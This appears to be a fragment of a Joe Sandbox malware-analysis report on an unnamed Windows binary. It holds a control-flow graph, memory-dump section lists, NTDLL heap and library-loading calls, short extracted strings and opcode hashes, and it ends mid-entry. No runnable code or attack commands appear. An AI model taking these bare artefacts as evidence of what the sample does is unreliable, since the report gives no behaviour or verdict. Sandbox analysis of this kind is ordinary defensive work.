                                                                              control_flow_graph 559 ffd7d7-ffd7e4 560 ffd7e6-ffd7e7 call 1001d97 559->560 561 ffd862-ffd866 559->561 569 ffd7ec-ffd7ef 560->569 562 ffd899-ffd89c 561->562 563 ffd868-ffd86e 561->563 565 ffd89e-ffd8b5 call ffeb70 call 1001292 562->565 566 ffd8f7-ffd8fa 562->566 567 ffd7f1-ffd7f3 563->567 568 ffd870-ffd87c 563->568 565->567 591 ffd8bb-ffd8d2 call ffeaf5 565->591 571 ffd8fc-ffd902 call ffee8a 566->571 572 ffd903-ffd905 566->572 576 ffd906-ffd909 567->576 573 ffd87e call 10015e2 568->573 574 ffd883-ffd886 568->574 569->567 575 ffd7f8-ffd7ff call ffeef8 569->575 571->572 572->576 573->574 574->572 580 ffd888-ffd897 call 1001893 call ffeba4 call 1001dc7 574->580 588 ffd808-ffd812 call 1001d4b call 1054aa8 575->588 589 ffd801-ffd806 call 1001dc7 575->589 580->572 589->567 604 ffd8eb-ffd8f2 call ffdfe4 591->604 605 ffd8d4-ffd8e2 call ffebe1 call 10589fc 591->605 604->567
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize__mtterm
                                                                              • String ID:
                                                                              • API String ID: 437650908-0
                                                                              • Opcode ID: 44b00b736602e8aaa5f85f5724e272838c8b80ead4ced18690a6ef80535ec818
                                                                              • Instruction ID: bfea8ee3e2e9dc6cdae1aa98bfa83069e8830a3a3e64728fee16a6a8c64d6467
                                                                              • Opcode Fuzzy Hash: 44b00b736602e8aaa5f85f5724e272838c8b80ead4ced18690a6ef80535ec818
                                                                              • Instruction Fuzzy Hash: 5511B23390410F566A3677B56C019BE3356AEA17B0F34042BFB81C50B1DF39C842B6A2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: ^]
                                                                              • API String ID: 1029625771-1882935148
                                                                              • Opcode ID: e598bd4c23c1cfc29321bafe836ef2a2fbfcb8dd2620cedc4e59676d3fa507d3
                                                                              • Instruction ID: 6c406131873829c07df1d41c38596765ed58c66286cca803b43e63ffa5747efd
                                                                              • Opcode Fuzzy Hash: e598bd4c23c1cfc29321bafe836ef2a2fbfcb8dd2620cedc4e59676d3fa507d3
                                                                              • Instruction Fuzzy Hash: CF317AB051D3429BE708CF10D6A462FBBE2AFC4B48F188A1DE4855B755D734C942EF86
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,FFFFFFFF), ref: 00FD6D81
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID: (;O
                                                                              • API String ID: 1279760036-2077936600
                                                                              • Opcode ID: e908cb905542e78dc63b09f3fede42922f481b6fd48a3439009a670ca606e178
                                                                              • Instruction ID: 6a005932222f376acd40bdc642d23e5a01c28955f88a167f322dc0554788908e
                                                                              • Opcode Fuzzy Hash: e908cb905542e78dc63b09f3fede42922f481b6fd48a3439009a670ca606e178
                                                                              • Instruction Fuzzy Hash: DC2159712083419BE708CF24C5A4B2BBBE2FBC8718F154A2DE49A8B391C775DD41DB86
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00FB784A
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00FB787E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID:
                                                                              • API String ID: 237503144-0
                                                                              • Opcode ID: 4e3fb1b417182454c4d2f73ef5032082ebe467111209045a72ccb7af0a27c97e
                                                                              • Instruction ID: 59973e40019e60217540c6c14afba8c731ac522cf356321e0323b3fae8ff4e16
                                                                              • Opcode Fuzzy Hash: 4e3fb1b417182454c4d2f73ef5032082ebe467111209045a72ccb7af0a27c97e
                                                                              • Instruction Fuzzy Hash: F2010871508344BBD710EB65CC86F67376DEB81760F044619F955CB2D0EA70E804DBB2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocString
                                                                              • String ID:
                                                                              • API String ID: 2525500382-0
                                                                              • Opcode ID: d44f81b200051c2ea3a9802121a64cab73c44db65336f08e3e149121e5f0845a
                                                                              • Instruction ID: 5d37159b4efd2c12d7a3b207b7103a50749cfd5641811e3d7330f4f4f69592c5
                                                                              • Opcode Fuzzy Hash: d44f81b200051c2ea3a9802121a64cab73c44db65336f08e3e149121e5f0845a
                                                                              • Instruction Fuzzy Hash: BA417971108B82DFC324CF28C499B56BBE1BB89314F04475CD4EA8BB91DB35E65ACB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocString
                                                                              • String ID:
                                                                              • API String ID: 2525500382-0
                                                                              • Opcode ID: 804479db56b4884bdafc06c862d364d16099b415220c992fcb01ef3e82b73668
                                                                              • Instruction ID: 1626d2bcca457913c0abada8792c04a8baebd616cdd78516f03e238f3a8df5a7
                                                                              • Opcode Fuzzy Hash: 804479db56b4884bdafc06c862d364d16099b415220c992fcb01ef3e82b73668
                                                                              • Instruction Fuzzy Hash: 8B413570108B829FD325CF28C498B46FFE1BB5A314F04874CD0EA8BB91D775A659CB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 95e44c068cd6e2d3103fd76c8764770e95d88f082af1392c119b61b8bbc68b3f
                                                                              • Instruction ID: 593ea61f14edc3b1751b0c3872fc58fbf0ba4ed51d02b0bbac5f1e58d10003d2
                                                                              • Opcode Fuzzy Hash: 95e44c068cd6e2d3103fd76c8764770e95d88f082af1392c119b61b8bbc68b3f
                                                                              • Instruction Fuzzy Hash: BF4104B06093819FE708DF11C5A072BBBE2EFC9B59F18890CE0855B381C735C9469F96
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 38d4eda4326cc8fed3f3062a80f459badb74632afae868d2f0787f0a2fa468d7
                                                                              • Instruction ID: 9a71997a8735639bef8b5c164ebdb6053567c870eb35580799a0cad84eca68e4
                                                                              • Opcode Fuzzy Hash: 38d4eda4326cc8fed3f3062a80f459badb74632afae868d2f0787f0a2fa468d7
                                                                              • Instruction Fuzzy Hash: C5216DB05193419BC308DF24EDA0B2F7BE2EB81748F188A1DE4895B751DB358906AB86
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,00FA98AB), ref: 00FD3BF1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 949cd7ff0fd21a02045a545da2257e62d9aabfbbbc7bd7a97885ea0bd37ce92d
                                                                              • Instruction ID: 7c34ab71f3c6b8c1eac3313843f7802a28bad706a9c3530382c8e1b6c8d3a355
                                                                              • Opcode Fuzzy Hash: 949cd7ff0fd21a02045a545da2257e62d9aabfbbbc7bd7a97885ea0bd37ce92d
                                                                              • Instruction Fuzzy Hash: 1A113631208301ABD704CF15C46475BFBA6EBC4328F148A1EE9A80B691CB75DA0ACBC6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 00FD7658
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 68bf2cf17ae2b6bdecfa07a88ed19fb5f5e7e0b5e1bfab586607a4c9bd3991a4
                                                                              • Instruction ID: 4f31e47551ea2e3f585cef700f9ea34bcb3862e39e1dcf7b6343f6c082d8ec65
                                                                              • Opcode Fuzzy Hash: 68bf2cf17ae2b6bdecfa07a88ed19fb5f5e7e0b5e1bfab586607a4c9bd3991a4
                                                                              • Instruction Fuzzy Hash: 3E0105725083519FD710DF04D99474FBBA2EBC4328F58CE4DE8A82B285E375D9498BD2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00FD3CB4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: 7f0a039728fb8643a76a420089efdcc1fd90ea77733d979ef89218c333a662e8
                                                                              • Instruction ID: 94834dcca403f0cd55fb2692cdf7447dd3c15f3e9515f9910cb47bd21e25026c
                                                                              • Opcode Fuzzy Hash: 7f0a039728fb8643a76a420089efdcc1fd90ea77733d979ef89218c333a662e8
                                                                              • Instruction Fuzzy Hash: 6B01A5701083409FE314CF10D4A472BBBE1EBC5328F248E4DE8A917691C775D949CF86
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL ref: 00FCD6B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 9833923486a6916a8a6dc9b6c6db20b57a04695fc8d46dc3d741562f0504ffa2
                                                                              • Instruction ID: 4b4abd6d5d562c2ba45157edd6353efca135d4250a03654b013188c6ed32a406
                                                                              • Opcode Fuzzy Hash: 9833923486a6916a8a6dc9b6c6db20b57a04695fc8d46dc3d741562f0504ffa2
                                                                              • Instruction Fuzzy Hash: 17F07FB4250B05CFC325DF39C494A26B7F1BF49304B11095DE5968BB60D731B846CF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .$.$0$[$false$null$true${
                                                                              • API String ID: 0-1639024219
                                                                              • Opcode ID: 7be12e412976d72cd995231d68dd29b6cef0f6e5e353b461e8b53c4f23b7b6dd
                                                                              • Instruction ID: d350aedbfc118355d945f623358b4a68d23360a2a3fc8263adbb755728870f71
                                                                              • Opcode Fuzzy Hash: 7be12e412976d72cd995231d68dd29b6cef0f6e5e353b461e8b53c4f23b7b6dd
                                                                              • Instruction Fuzzy Hash: 141225F4E003099BE7105F25DC4572BBBE4BF42394F1A8538E88687292FB79D905EB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @5O7$X1S3$o=_?$pAuC$tEDG
                                                                              • API String ID: 0-858526541
                                                                              • Opcode ID: a8aec1587e37def0222da65ad8556f3371465ee7685ca0a10df8aae975d589b3
                                                                              • Instruction ID: c84ff8e439219465b40a8ae94411e78f5a802b65a927254426873971a1b0c00f
                                                                              • Opcode Fuzzy Hash: a8aec1587e37def0222da65ad8556f3371465ee7685ca0a10df8aae975d589b3
                                                                              • Instruction Fuzzy Hash: 796151B0605B86AFE328CF25C891795FBA2FB52704F108A0DC0AA5BB45D735B466CFD4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$8
                                                                              • API String ID: 0-46163386
                                                                              • Opcode ID: e2231f16f99b54f996a98a0bf3de0ff9a582ce289ca181e016bd4bbeb54389ae
                                                                              • Instruction ID: cbee04ef30e9177887418df9cba7b3b3ed922d664e948d85e83fd05c2869cb77
                                                                              • Opcode Fuzzy Hash: e2231f16f99b54f996a98a0bf3de0ff9a582ce289ca181e016bd4bbeb54389ae
                                                                              • Instruction Fuzzy Hash: FF728BB1A087409FD714CF18C890B9BBBE2BF99714F18892DF9898B391D375D844DB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: R-,T$R-,T
                                                                              • API String ID: 0-2000385741
                                                                              • Opcode ID: 407c4462e1263b7cbac799b7631450366ed28f76eb96df75cabcff75d6a47985
                                                                              • Instruction ID: 480418e4be6636e0097b7ce0c89c233fa20ec78eac2daeaddcde1e202686317d
                                                                              • Opcode Fuzzy Hash: 407c4462e1263b7cbac799b7631450366ed28f76eb96df75cabcff75d6a47985
